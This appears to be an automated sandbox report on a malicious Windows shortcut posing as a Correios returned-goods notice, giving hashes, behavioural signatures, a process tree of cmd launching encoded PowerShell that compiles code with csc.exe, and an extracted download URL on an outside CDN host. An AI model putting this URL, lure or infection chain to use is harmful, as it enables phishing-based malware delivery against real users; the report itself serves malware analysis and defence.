Analysis
Max time kernel: 121s
Max time network: 126s
Platform: windows7_x64
Resource: win7-20240611-en
Resource tags: arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
Submitted: 13-06-2024 02:31

Static task: static1
Behavioral task: behavioral1
  Sample: Mercadoria_Devolvida-Correios-H0C42E2H.lnk
  Resource: win7-20240611-en
Behavioral task: behavioral2
  Sample: Mercadoria_Devolvida-Correios-H0C42E2H.lnk
  Resource: win10v2004-20240508-en
General
Target: Mercadoria_Devolvida-Correios-H0C42E2H.lnk
Size: 3KB
MD5: 246e74b6fffb9d5994f7f70bb6509b45
SHA1: 4b7bdf4808ce987b9f94ea40bdd081217867483a
SHA256: 0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
SHA512: 178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08
Malware Config
Extracted
https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%
Signatures

Blocklisted process makes network request (3 IoCs)
  flow  pid   Process
  3     2748  powershell.exe
  4     2748  powershell.exe
  5     2748  powershell.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  2748  powershell.exe
  2748  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2748  powershell.exe

Suspicious use of WriteProcessMemory (9 IoCs)
  description                         pid   Process         procid_target
  PID 2480 wrote to memory of 2748    2480  cmd.exe         29
  PID 2480 wrote to memory of 2748    2480  cmd.exe         29
  PID 2480 wrote to memory of 2748    2480  cmd.exe         29
  PID 2748 wrote to memory of 2944    2748  powershell.exe  30
  PID 2748 wrote to memory of 2944    2748  powershell.exe  30
  PID 2748 wrote to memory of 2944    2748  powershell.exe  30
  PID 2944 wrote to memory of 2560    2944  csc.exe         31
  PID 2944 wrote to memory of 2560    2944  csc.exe         31
  PID 2944 wrote to memory of 2560    2944  csc.exe         31
Processes

C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk
  PID: 2480
  - Suspicious use of WriteProcessMemory

  C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en 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
    PID: 2748
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vaotr-rh.cmdline"
      PID: 2944
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2251.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2250.tmp"
        PID: 2560
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 1KB
MD5: 4d3d7cb4bc4ed06b00551335e61f724f
SHA1: 14416124515d673af368d23a5fe63e95bb857778
SHA256: 192ce989995a2c53d6fbc3a99c5203528b68ea9178e47d0ab65a94e9b4f8c143
SHA512: 08ed498642cbf8742a2274175a25df17496d4c84b118febcff68eb21a16fd182d75322d42a0e2e88d6e5b696b8b5f7823644df942c47521c5bf244e896846bf6

Filesize: 3KB
MD5: 519f0f8988678e2d402c51e0599a04d7
SHA1: 4a75e96d4a821ca721c85d574a187bfd50ca62a0
SHA256: 1d9a8f5011c76464941831f04933d57367c8e109de7b876667b3118c52ef1b01
SHA512: a32f8225001b78ddf9e8a669df920213b7a36b96a7cfa52caed7b15588f8f4a1ce49a051ddaf481a4a32dd4e0a7e5bba5f6cabe34cc79f7e85adcd9e860541a2

Filesize: 7KB
MD5: dfd498ea7e752d5186c7e0e20e23324c
SHA1: a5014734774e36a917097d320c826328b47a3f6a
SHA256: 1a595fe7a0c2ec07c5689ed4196c7448121a5a4824cd2d0153c98bfadcb7d748
SHA512: 7c6a7638a5c49a0cd1919ff53bcd3d478f7eb1b268381cdd1e13d1a4ded2cb3d342b924702fcf9d55cef3ea289f1eda77d62a14c295d7f89002d16a866959e65

Filesize: 652B
MD5: 9053cace7763f13f477946bdf6264ec4
SHA1: c4607d0d3064e64f6cfe155cce87b1708dc5946c
SHA256: d20ac6c682187207ea711de5d029711a87c150d2fa145764630d6dc09a37468f
SHA512: 97ddf59ec90a6ca55c8862e57be9f42afb815cf0763c2126cd92355c836506b50294bd074e60510707f65d230273fab3776d210af1c42db3d1afdde94780c59d

Filesize: 187B
MD5: 7b0e7177dfbb9edd1c1ef08b4fdfae2f
SHA1: cb11a0252cdad66ec247312ccb7feb46456e52b6
SHA256: 6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
SHA512: 7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

Filesize: 309B
MD5: c9c37412c4e78ea0e0ca3395102689a0
SHA1: 21688e857f03f11852a99da078f9125ba42f2110
SHA256: 08ea5275ed60fb83fd7485f72ce364b874242c37a17683225fc64849748cb506
SHA512: a1f9ad50d2b27c8700cd28af0c05cb7a67ef9a1b438289466c4c867fbf3a3a6bd8348eb59148d3c187fa8f6873fe4bf53baa5714d7d6614ada96a8d399beeed0